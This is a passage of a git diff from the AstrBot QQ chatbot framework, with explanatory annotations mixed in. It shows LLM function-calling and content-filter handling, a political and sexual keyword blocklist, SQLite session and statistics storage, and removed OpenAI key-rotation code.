                        return MessageResult("AstrBot Function-calling 异常:未找到请求的函数调用。")
                    try:
                        args = json.loads(llm_result.arguments)
                        args['ame'] = message
                        args['context'] = self.context
                        try:
                            cmd_res = await func_obj(**args)
                        except TypeError as e:
                            args.pop('ame')
                            args.pop('context')
                            cmd_res = await func_obj(**args)
                        if isinstance(cmd_res, CommandResult):
                            return MessageResult(
                                cmd_res.message_chain,
                                is_command_call=True,
                                use_t2i=cmd_res.is_use_t2i
                            )
                        elif isinstance(cmd_res, str):
                            return MessageResult(cmd_res)
                        elif not cmd_res:
                            return
                        else:
                            return MessageResult(f"AstrBot Function-calling 异常:调用:{llm_result} 时,返回了未知的返回值类型。")
                    except BaseException as e:
                        traceback.print_exc()
                        return MessageResult("AstrBot Function-calling 异常:" + str(e))
                else:
                    return MessageResult(llm_result)

            else:
                # normal chat
                tool_use_flag = False
                llm_result = await provider.text_chat(
                    prompt=msg_plain,
                    session_id=message.session_id,
                    image_url=image_url
                )
        except BadRequestError as e:
            if tool_use_flag:
                # seems like the model don't support function-calling
                logger.error(f"error: {e}. Using local function-calling implementation")

                try:
                    # use local function-calling implementation
                    args = {
                        'question': llm_result,
                        'func_definition': self.llm_tools.func_dump(),
                    }
                    _, has_func = await self.llm_tools.func_call(**args)

                    if not has_func:
                        # normal chat
                        llm_result = await provider.text_chat(
                            prompt=msg_plain,
                            session_id=message.session_id,
                            image_url=image_url
                        )
                except BaseException as e:
                    logger.error(traceback.format_exc())
                    return CommandResult("AstrBot Function-calling 异常:" + str(e))

        except BaseException as e:
            logger.error(traceback.format_exc())
            logger.error(f"LLM 调用失败。")
            return MessageResult("AstrBot 请求 LLM 资源失败:" + str(e))

        # concatenate reply prefix
        if self.reply_prefix:
            llm_result = self.reply_prefix + llm_result

        # mask unsafe content
        llm_result = self.content_safety_helper.filter_content(llm_result)
        check = self.content_safety_helper.baidu_check(llm_result)
        if not check:
            return MessageResult("LLM 输出的信息包含违规内容,由于机器人管理者开启了内容安全审核,该条消息已拦截。")

        return MessageResult(llm_result)
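
The rate limiter in handler.py is a fixed-window counter keyed by session: the first message in a window stores a timestamp and a count of 1, later messages increment the count until `rate_limit_count` is reached, and a fresh window starts once more than `rate_limit_time` seconds have passed. A standalone sketch of that same logic, with the `Context`/config plumbing stripped out and the two limits passed in directly (a simplification of the original constructor):

```python
import time

class FixedWindowLimiter:
    """Standalone restatement of RateLimitHelper.check_frequency; limits are passed in directly."""

    def __init__(self, window_seconds: int, max_count: int) -> None:
        self.window_seconds = window_seconds
        self.max_count = max_count
        self.state: dict[str, dict[str, int]] = {}

    def check(self, session_id: str) -> bool:
        now = int(time.time())
        entry = self.state.get(session_id)
        if entry is None:
            # first message from this session opens a new window
            self.state[session_id] = {"time": now, "count": 1}
            return True
        if now - entry["time"] > self.window_seconds:
            # window expired: reset the timestamp and counter
            entry["time"] = now
            entry["count"] = 1
            return True
        if entry["count"] >= self.max_count:
            return False  # over the limit inside the current window
        entry["count"] += 1
        return True
```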
114
astrbot/message/unfit_words.py
Normal file
@@ -0,0 +1,114 @@
# Collected from around the internet.
# Question-side blocklist (applied to the user's input).
# Regular expressions are supported.
unfit_words_q = [
    "习近平", "胡锦涛", "江泽民", "温家宝", "李克强", "李长春", "毛泽东", "邓小平", "周恩来",
    "社会主义", "共产党", "共产主义", "大陆官方", "北京政权", "中华帝国", "中国政府", "共狗",
    "六四事件", "天安门", "六四", "政治局常委", "学潮", "八九", "二十大",
    "民进党", "台独", "台湾独立", "台湾国", "国民党", "台湾民国", "中华民国",
    "pornhub", "Pornhub",
    "作爱", "做爱", "性交", "自慰", "阴茎", "淫妇", "肛交", "交配", "性关系", "性活动",
    "色情", "色图", "裸体", "小穴", "淫荡", "性爱",
    "港独", "法轮功", "六四",
]

# Reply-side filter list (matches are masked in the model's output).
unfit_words = [
    "习近平", "胡锦涛", "江泽民", "温家宝", "李克强", "李长春", "毛泽东", "邓小平", "周恩来",
    "社会主义", "共产党", "共产主义", "大陆官方", "北京政权", "中华帝国", "中国政府", "共狗",
    "六四事件", "天安门", "六四", "政治局常委", "学潮", "八九", "二十大",
    "民进党", "台独", "台湾独立", "台湾国", "国民党", "台湾民国", "中华民国",
    "pornhub", "Pornhub",
    "作爱", "做爱", "性交", "自慰", "阴茎", "淫妇", "肛交", "交配", "性关系", "性活动",
    "色情", "色图", "涩图", "裸体", "小穴", "淫荡", "性爱",
    "中华人民共和国", "党中央", "中央军委主席", "台湾", "港独", "法轮功", "PRC",
]
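The question-side list is documented as regex-capable, while the reply-side list is used for masking rather than rejecting the whole reply. A small self-contained sketch of both uses; the two sample lists below are illustrative subsets of the ones defined in this file, and the regex check assumes the "支持正则" note (the simpler substring check used elsewhere in the repo behaves the same for plain words):

```python
import re

# Illustrative subsets of unfit_words_q / unfit_words above.
unfit_words_q_sample = ["pornhub", "六四"]
unfit_words_sample = ["PRC"]

def is_blocked_question(text: str) -> bool:
    # Question-side check: entries are treated as regular expressions,
    # and any hit rejects the message.
    return any(re.search(pattern, text) for pattern in unfit_words_q_sample)

def mask_reply(text: str) -> str:
    # Reply-side filtering masks hits instead of dropping the reply.
    for word in unfit_words_sample:
        text = text.replace(word, "***")
    return text

print(is_blocked_question("tell me about pornhub"))  # True
print(mask_reply("the PRC was founded in 1949"))     # the *** was founded in 1949
```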
269
astrbot/persist/helper.py
Normal file
@@ -0,0 +1,269 @@
|
||||
import sqlite3
|
||||
import os
|
||||
import shutil
|
||||
import time
|
||||
from typing import Tuple
|
||||
|
||||
class dbConn():
|
||||
def __init__(self):
|
||||
db_path = "data/data.db"
|
||||
if os.path.exists("data.db"):
|
||||
shutil.copy("data.db", db_path)
|
||||
with open(os.path.dirname(__file__) + "/initialization.sql", "r") as f:
|
||||
sql = f.read()
|
||||
|
||||
self.conn = sqlite3.connect(db_path)
|
||||
self.conn.text_factory = str
|
||||
c = self.conn.cursor()
|
||||
c.executescript(sql)
|
||||
self.conn.commit()
|
||||
|
||||
def record_message(self, platform, session_id):
|
||||
curr_ts = int(time.time())
|
||||
self.increment_stat_session(platform, session_id, 1)
|
||||
self.increment_stat_message(curr_ts, 1)
|
||||
self.increment_stat_platform(curr_ts, platform, 1)
|
||||
|
||||
def insert_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_session(qq_id, history) VALUES (?, ?)
|
||||
''', (qq_id, history)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def update_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_session SET history = ? WHERE qq_id = ?
|
||||
''', (history, qq_id)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def get_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone()
|
||||
|
||||
def get_all_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def check_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def delete_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
DELETE FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def increment_stat_session(self, platform, session_id, cnt):
|
||||
# if not exist, insert
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
if self.check_stat_session(platform, session_id):
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_session SET cnt = cnt + ? WHERE platform = ? AND session_id = ?
|
||||
''', (cnt, platform, session_id)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_session(platform, session_id, cnt) VALUES (?, ?, ?)
|
||||
''', (platform, session_id, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_session(self, platform, session_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_session WHERE platform = ? AND session_id = ?
|
||||
''', (platform, session_id)
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def get_all_stat_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_session_cnt_total(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT COUNT(*) FROM tb_stat_session
|
||||
'''
|
||||
)
|
||||
return c.fetchone()[0]
|
||||
|
||||
def increment_stat_message(self, ts, cnt):
|
||||
# 以一个小时为单位。ts的单位是秒。
|
||||
# 找到最近的一个小时,如果没有,就插入
|
||||
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
ok, new_ts = self.check_stat_message(ts)
|
||||
|
||||
if ok:
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_message SET cnt = cnt + ? WHERE ts = ?
|
||||
''', (cnt, new_ts)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_message(ts, cnt) VALUES (?, ?)
|
||||
''', (new_ts, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_message(self, ts) -> Tuple[bool, int]:
|
||||
# 换算成当地整点的时间戳
|
||||
|
||||
ts = ts - ts % 3600
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_message WHERE ts = ?
|
||||
''', (ts, )
|
||||
)
|
||||
if c.fetchone() is not None:
|
||||
return True, ts
|
||||
else:
|
||||
return False, ts
|
||||
|
||||
def get_last_24h_stat_message(self):
|
||||
# 获取最近24小时的消息统计
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_message WHERE ts > ?
|
||||
''', (time.time() - 86400, )
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_message_cnt_total(self) -> int:
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT SUM(cnt) FROM tb_stat_message
|
||||
'''
|
||||
)
|
||||
return c.fetchone()[0]
|
||||
|
||||
def increment_stat_platform(self, ts, platform, cnt):
|
||||
# 以一个小时为单位。ts的单位是秒。
|
||||
# 找到最近的一个小时,如果没有,就插入
|
||||
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
ok, new_ts = self.check_stat_platform(ts, platform)
|
||||
|
||||
if ok:
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_platform SET cnt = cnt + ? WHERE ts = ? AND platform = ?
|
||||
''', (cnt, new_ts, platform)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_platform(ts, platform, cnt) VALUES (?, ?, ?)
|
||||
''', (new_ts, platform, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_platform(self, ts, platform):
|
||||
# 换算成当地整点的时间戳
|
||||
|
||||
ts = ts - ts % 3600
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_platform WHERE ts = ? AND platform = ?
|
||||
''', (ts, platform)
|
||||
)
|
||||
if c.fetchone() is not None:
|
||||
return True, ts
|
||||
else:
|
||||
return False, ts
|
||||
|
||||
def get_last_24h_stat_platform(self):
|
||||
# 获取最近24小时的消息统计
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_platform WHERE ts > ?
|
||||
''', (time.time() - 86400, )
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_platform_cnt_total(self) -> int:
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT platform, SUM(cnt) FROM tb_stat_platform GROUP BY platform
|
||||
'''
|
||||
)
|
||||
# return c.fetchall()
|
||||
platforms = []
|
||||
ret = c.fetchall()
|
||||
for i in ret:
|
||||
# platforms[i[0]] = i[1]
|
||||
platforms.append({
|
||||
"name": i[0],
|
||||
"count": i[1]
|
||||
})
|
||||
return platforms
|
||||
|
||||
def close(self):
|
||||
self.conn.close()
|
||||
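The message/platform statistics above bucket rows by `ts - ts % 3600`, i.e. the Unix timestamp floored to the start of its hour, so every event inside the same hour increments a single row. A quick worked example of that bucketing:

```python
import datetime

def hour_bucket(ts: int) -> int:
    # Floor a Unix timestamp to the start of its hour, as in
    # check_stat_message / check_stat_platform above.
    return ts - ts % 3600

ts = 1670490549  # 2022-12-08 09:09:09 UTC
print(hour_bucket(ts))  # 1670490000
print(datetime.datetime.fromtimestamp(hour_bucket(ts), tz=datetime.timezone.utc))
# 2022-12-08 09:00:00+00:00
```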
18
astrbot/persist/initialization.sql
Normal file
@@ -0,0 +1,18 @@
CREATE TABLE IF NOT EXISTS tb_session(
    qq_id VARCHAR(32) PRIMARY KEY,
    history TEXT
);
CREATE TABLE IF NOT EXISTS tb_stat_session(
    platform VARCHAR(32),
    session_id VARCHAR(32),
    cnt INTEGER
);
CREATE TABLE IF NOT EXISTS tb_stat_message(
    ts INTEGER,
    cnt INTEGER
);
CREATE TABLE IF NOT EXISTS tb_stat_platform(
    ts INTEGER,
    platform VARCHAR(32),
    cnt INTEGER
);
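Because every statement is guarded by `CREATE TABLE IF NOT EXISTS`, `dbConn.__init__` can feed the whole script to `executescript()` on every start-up without clobbering existing data. A small sketch against an in-memory database (the real class uses `data/data.db`; `:memory:` is used here only so the example is self-contained):

```python
import sqlite3

schema = """
CREATE TABLE IF NOT EXISTS tb_stat_message(
    ts INTEGER,
    cnt INTEGER
);
"""

conn = sqlite3.connect(":memory:")
conn.executescript(schema)   # first run creates the table
conn.executescript(schema)   # re-running is a no-op thanks to IF NOT EXISTS
conn.execute("INSERT INTO tb_stat_message(ts, cnt) VALUES (?, ?)", (1670490000, 3))
print(conn.execute("SELECT SUM(cnt) FROM tb_stat_message").fetchone()[0])  # 3
conn.close()
```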
323
botpy.log
@@ -1,323 +0,0 @@
@@ -1,29 +0,0 @@
openai:
  # Note: since version 1.7, multiple keys with automatic switching are supported:
  # key:
  #   - xxxxx
  #   - xxxxxx
  # Use the format above in the uncommented section below.
  key:
    -
  chatGPTConfigs:
    engine: text-davinci-003
    max_tokens: 800
    temperature: 0.8
    top_p: 1
    frequency_penalty: 0.4
    presence_penalty: 0.3
  total_tokens_limit: 700

qqbot:
  appid:
  token:

# Whether each user gets an independent session
uniqueSessionMode: false

# QChannelBot version
version: 1.7 beta

# [Beta] History dump interval (minutes)
dump_history_interval: 10
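The removed config documents the 1.7-era multi-key format: `openai.key` may be a YAML list that the key switcher rotates through. A hedged sketch of loading that list and dropping unfilled placeholders; the inline YAML string and the sample key values are examples only (the placeholder value "修改我!!" is the one the bot itself checks for):

```python
import yaml

raw = """
openai:
  key:
    - sk-aaaa
    - sk-bbbb
"""

cfg = yaml.safe_load(raw)
keys = cfg["openai"]["key"] or []
# Drop empty / placeholder entries before handing the list to the key switcher.
keys = [k for k in keys if k and k != "修改我!!"]
print(keys)  # ['sk-aaaa', 'sk-bbbb']
```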
@@ -1,86 +0,0 @@
|
||||
import sqlite3
|
||||
import yaml
|
||||
|
||||
# TODO: 数据库缓存prompt
|
||||
|
||||
class dbConn():
|
||||
def __init__(self):
|
||||
# 读取参数,并支持中文
|
||||
conn = sqlite3.connect("data.db")
|
||||
conn.text_factory=str
|
||||
self.conn = conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_session(
|
||||
qq_id VARCHAR(32) PRIMARY KEY,
|
||||
history TEXT
|
||||
)
|
||||
'''
|
||||
)
|
||||
|
||||
conn.commit()
|
||||
|
||||
def insert_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_session(qq_id, history) VALUES (?, ?)
|
||||
''', (qq_id, history)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def update_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_session SET history = ? WHERE qq_id = ?
|
||||
''', (history, qq_id)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def get_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone()
|
||||
|
||||
def get_all_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def check_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def delete_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
DELETE FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def close(self):
|
||||
self.conn.close()
|
||||
|
||||
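The `check_session` / `insert_session` / `update_session` trio above amounts to a manual upsert keyed on `qq_id`, which is how the bot flushes its in-memory session cache to SQLite. A compact standalone sketch of that pattern using an in-memory database; the table layout is copied from above, while the helper name is invented for the example:

```python
import json
import sqlite3

# In-memory stand-in for the tb_session table managed by dbConn above.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE IF NOT EXISTS tb_session(qq_id VARCHAR(32) PRIMARY KEY, history TEXT)")

def save_session(qq_id: str, data: list):
    # check -> UPDATE or INSERT, the same manual upsert as dbConn performs.
    payload = json.dumps({"data": data})
    exists = conn.execute("SELECT 1 FROM tb_session WHERE qq_id = ?", (qq_id,)).fetchone()
    if exists:
        conn.execute("UPDATE tb_session SET history = ? WHERE qq_id = ?", (payload, qq_id))
    else:
        conn.execute("INSERT INTO tb_session(qq_id, history) VALUES (?, ?)", (qq_id, payload))
    conn.commit()

save_session("12345", [{"prompt": "Human: hi\nAI: hello\n", "single_tokens": 12}])
save_session("12345", [{"prompt": "Human: hi\nAI: hello\nHuman: more\nAI: sure\n", "single_tokens": 30}])
print(conn.execute("SELECT COUNT(*) FROM tb_session").fetchone()[0])  # 1 -- updated, not duplicated
```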
@@ -1,169 +0,0 @@
|
||||
import openai
|
||||
import yaml
|
||||
from util.errors.errors import PromptExceededError
|
||||
import json
|
||||
import time
|
||||
import os
|
||||
import sys
|
||||
|
||||
inst = None
|
||||
# 适配pyinstaller
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
key_record_path = abs_path+'chatgpt_key_record'
|
||||
|
||||
class ChatGPT:
|
||||
def __init__(self):
|
||||
self.key_list = []
|
||||
with open(abs_path+"configs/config.yaml", 'r', encoding='utf-8') as ymlfile:
|
||||
cfg = yaml.safe_load(ymlfile)
|
||||
if cfg['openai']['key'] != '' and cfg['openai']['key'] != '修改我!!':  # 'and', not 'or': otherwise the placeholder check can never fail
|
||||
print("读取ChatGPT Key成功")
|
||||
self.key_list = cfg['openai']['key']
|
||||
# openai.api_key = cfg['openai']['key']
|
||||
else:
|
||||
input("请先去完善ChatGPT的Key。详情请前往https://beta.openai.com/account/api-keys")
|
||||
|
||||
# init key record
|
||||
self.init_key_record()
|
||||
|
||||
chatGPT_configs = cfg['openai']['chatGPTConfigs']
|
||||
print(f'加载ChatGPTConfigs: {chatGPT_configs}')
|
||||
self.chatGPT_configs = chatGPT_configs
|
||||
self.openai_configs = cfg['openai']
|
||||
|
||||
def chat(self, prompt, image_mode = False):
|
||||
try:
|
||||
if not image_mode:
|
||||
response = openai.Completion.create(
|
||||
prompt=prompt,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
else:
|
||||
response = openai.Image.create(
|
||||
prompt=prompt,
|
||||
n=1,
|
||||
size="512x512",
|
||||
)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
if 'You exceeded' in str(e) or 'Billing hard limit has been reached' in str(e) or 'No API key provided.' in str(e):
|
||||
print("当前Key已超额,正在切换")
|
||||
self.key_stat[openai.api_key]['exceed'] = True
|
||||
self.save_key_record()
|
||||
|
||||
response, is_switched = self.handle_switch_key(prompt)
|
||||
if not is_switched:
|
||||
# 所有Key都超额
|
||||
raise e
|
||||
else:
|
||||
if not image_mode:
|
||||
response = openai.Completion.create(
|
||||
prompt=prompt,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
else:
|
||||
response = openai.Image.create(
|
||||
prompt=prompt,
|
||||
n=1,
|
||||
size="512x512",
|
||||
)
|
||||
if not image_mode:
|
||||
self.key_stat[openai.api_key]['used'] += response['usage']['total_tokens']
|
||||
self.save_key_record()
|
||||
print("[ChatGPT] "+str(response["choices"][0]["text"]))
|
||||
return str(response["choices"][0]["text"]).strip(), response['usage']['total_tokens']
|
||||
else:
|
||||
return response['data'][0]['url']
|
||||
|
||||
def handle_switch_key(self, prompt):
|
||||
while True:
|
||||
is_all_exceed = True
|
||||
for key in self.key_stat:
|
||||
if not self.key_stat[key]['exceed']:
|
||||
is_all_exceed = False
|
||||
openai.api_key = key
|
||||
print(f"切换到Key: {key}, 已使用token: {self.key_stat[key]['used']}")
|
||||
if prompt != '':
|
||||
try:
|
||||
response = openai.Completion.create(
|
||||
prompt=prompt,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
return response, True
|
||||
except Exception as e:
|
||||
print(e)
|
||||
if 'You exceeded' in str(e):
|
||||
print("当前Key已超额,正在切换")
|
||||
self.key_stat[openai.api_key]['exceed'] = True
|
||||
self.save_key_record()
|
||||
time.sleep(1)
|
||||
continue
|
||||
else:
|
||||
return True
|
||||
if is_all_exceed:
|
||||
print("所有Key已超额")
|
||||
return None, False
|
||||
|
||||
def getConfigs(self):
|
||||
return self.openai_configs
|
||||
|
||||
def save_key_record(self):
|
||||
with open(key_record_path, 'w', encoding='utf-8') as f:
|
||||
json.dump(self.key_stat, f)
|
||||
|
||||
def get_key_stat(self):
|
||||
return self.key_stat
|
||||
def get_key_list(self):
|
||||
return self.key_list
|
||||
|
||||
# 添加key
|
||||
def append_key(self, key, sponsor):
|
||||
self.key_list.append(key)
|
||||
self.key_stat[key] = {'exceed': False, 'used': 0, 'sponsor': sponsor}
|
||||
self.save_key_record()
|
||||
self.init_key_record()
|
||||
# 检查key是否可用
|
||||
def check_key(self, key):
|
||||
pre_key = openai.api_key
|
||||
openai.api_key = key
|
||||
try:
|
||||
openai.Completion.create(
|
||||
prompt="1",
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
openai.api_key = pre_key
|
||||
return True
|
||||
except Exception as e:
|
||||
pass
|
||||
openai.api_key = pre_key
|
||||
return False
|
||||
|
||||
#将key_list的key转储到key_record中,并记录相关数据
|
||||
def init_key_record(self):
|
||||
if not os.path.exists(key_record_path):
|
||||
with open(key_record_path, 'w', encoding='utf-8') as f:
|
||||
json.dump({}, f)
|
||||
with open(key_record_path, 'r', encoding='utf-8') as keyfile:
|
||||
try:
|
||||
self.key_stat = json.load(keyfile)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
self.key_stat = {}
|
||||
finally:
|
||||
for key in self.key_list:
|
||||
if key not in self.key_stat:
|
||||
self.key_stat[key] = {'exceed': False, 'used': 0}
|
||||
# if openai.api_key is None:
|
||||
# openai.api_key = key
|
||||
else:
|
||||
# if self.key_stat[key]['exceed']:
|
||||
# print(f"Key: {key} 已超额")
|
||||
# continue
|
||||
# else:
|
||||
# if openai.api_key is None:
|
||||
# openai.api_key = key
|
||||
# print(f"使用Key: {key}, 已使用token: {self.key_stat[key]['used']}")
|
||||
pass
|
||||
if openai.api_key is None:
|
||||
self.handle_switch_key("")
|
||||
self.save_key_record()
|
||||
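The removed `ChatGPT` class marks a key as `exceed` in `key_stat` when the API reports a quota error and moves on to the next entry. A stripped-down sketch of that rotation, with the OpenAI call replaced by a stand-in function and a placeholder exception type (neither is part of the real API):

```python
class QuotaExceeded(Exception):
    """Placeholder for the 'You exceeded ...' errors raised by the real API."""

key_stat = {
    "sk-aaaa": {"exceed": True,  "used": 41000},
    "sk-bbbb": {"exceed": False, "used": 1200},
}

def pick_key():
    # First key not yet marked as exceeded, else give up --
    # the same loop shape as handle_switch_key above.
    for key, stat in key_stat.items():
        if not stat["exceed"]:
            return key
    return None

def fake_api_call(key: str, prompt: str) -> str:
    # Stand-in for openai.Completion.create(...).
    if key == "sk-aaaa":
        raise QuotaExceeded("You exceeded your current quota")
    return f"[{key}] echo: {prompt}"

def complete(prompt: str) -> str:
    while True:
        key = pick_key()
        if key is None:
            raise QuotaExceeded("all keys exhausted")
        try:
            return fake_api_call(key, prompt)
        except QuotaExceeded:
            key_stat[key]["exceed"] = True  # mark the key and try the next one

print(complete("hello"))  # [sk-bbbb] echo: hello
```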
@@ -1,673 +0,0 @@
|
||||
import botpy
|
||||
from botpy.message import Message
|
||||
import yaml
|
||||
import re
|
||||
from util.errors.errors import PromptExceededError
|
||||
from botpy.message import DirectMessage
|
||||
import json
|
||||
import threading
|
||||
import asyncio
|
||||
import time
|
||||
from cores.database.conn import dbConn
|
||||
import requests
|
||||
import util.unfit_words as uw
|
||||
import os
|
||||
import sys
|
||||
from cores.qqbot.personality import personalities
|
||||
|
||||
history_dump_interval = 10
|
||||
# QQBotClient实例
|
||||
client = ''
|
||||
# ChatGPT实例
|
||||
global chatgpt
|
||||
# 缓存的会话
|
||||
session_dict = {}
|
||||
# 最大缓存token(在配置里改 configs/config.yaml)
|
||||
max_tokens = 2000
|
||||
# 配置信息
|
||||
config = {}
|
||||
# 统计信息
|
||||
count = {}
|
||||
# 统计信息
|
||||
stat_file = ''
|
||||
# 是否独立会话默认值
|
||||
uniqueSession = False
|
||||
|
||||
# 日志记录
|
||||
logf = open('log.log', 'a+', encoding='utf-8')
|
||||
# 是否上传日志,仅上传频道数量等数量的统计信息
|
||||
is_upload_log = True
|
||||
|
||||
# 用户发言频率
|
||||
user_frequency = {}
|
||||
# 时间默认值
|
||||
frequency_time = 60
|
||||
# 计数默认值
|
||||
frequency_count = 2
|
||||
|
||||
# 公告(可自定义):
|
||||
announcement = ""
|
||||
|
||||
# 人格信息
|
||||
now_personality = {}
|
||||
|
||||
# 适配pyinstaller
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
|
||||
def new_sub_thread(func, args=()):
|
||||
thread = threading.Thread(target=func, args=args, daemon=True)
|
||||
thread.start()
|
||||
|
||||
class botClient(botpy.Client):
|
||||
# 收到At消息
|
||||
async def on_at_message_create(self, message: Message):
|
||||
toggle_count(at=True, message=message)
|
||||
# executor.submit(oper_msg, message, True)
|
||||
new_sub_thread(oper_msg, (message, True))
|
||||
# await oper_msg(message=message, at=True)
|
||||
|
||||
# 收到私聊消息
|
||||
async def on_direct_message_create(self, message: DirectMessage):
|
||||
toggle_count(at=False, message=message)
|
||||
# executor.submit(oper_msg, message, True)
|
||||
# await oper_msg(message=message, at=False)
|
||||
new_sub_thread(oper_msg, (message, False))
|
||||
|
||||
# 写入统计信息
|
||||
def toggle_count(at: bool, message):
|
||||
global stat_file
|
||||
try:
|
||||
if str(message.guild_id) not in count:
|
||||
count[str(message.guild_id)] = {
|
||||
'count': 1,
|
||||
'direct_count': 1,
|
||||
}
|
||||
else:
|
||||
count[str(message.guild_id)]['count'] += 1
|
||||
if not at:
|
||||
count[str(message.guild_id)]['direct_count'] += 1
|
||||
stat_file = open(abs_path+"configs/stat", 'w', encoding='utf-8')
|
||||
stat_file.write(json.dumps(count))
|
||||
stat_file.flush()
|
||||
stat_file.close()
|
||||
except BaseException:
|
||||
pass
|
||||
|
||||
# 转储历史记录的定时器~ Soulter
|
||||
def dump_history():
|
||||
time.sleep(10)
|
||||
global session_dict, history_dump_interval
|
||||
db = dbConn()
|
||||
while True:
|
||||
try:
|
||||
# print("转储历史记录...")
|
||||
for key in session_dict:
|
||||
# print("TEST: "+str(db.get_session(key)))
|
||||
data = session_dict[key]
|
||||
data_json = {
|
||||
'data': data
|
||||
}
|
||||
if db.check_session(key):
|
||||
db.update_session(key, json.dumps(data_json))
|
||||
else:
|
||||
db.insert_session(key, json.dumps(data_json))
|
||||
# print("转储历史记录完毕")
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
# dump again after history_dump_interval minutes (the config value is in minutes)
time.sleep(60 * history_dump_interval)
|
||||
|
||||
# 上传统计信息
|
||||
def upload():
|
||||
global object_id
|
||||
while True:
|
||||
addr = ''
|
||||
try:
|
||||
# 用户唯一性标识
|
||||
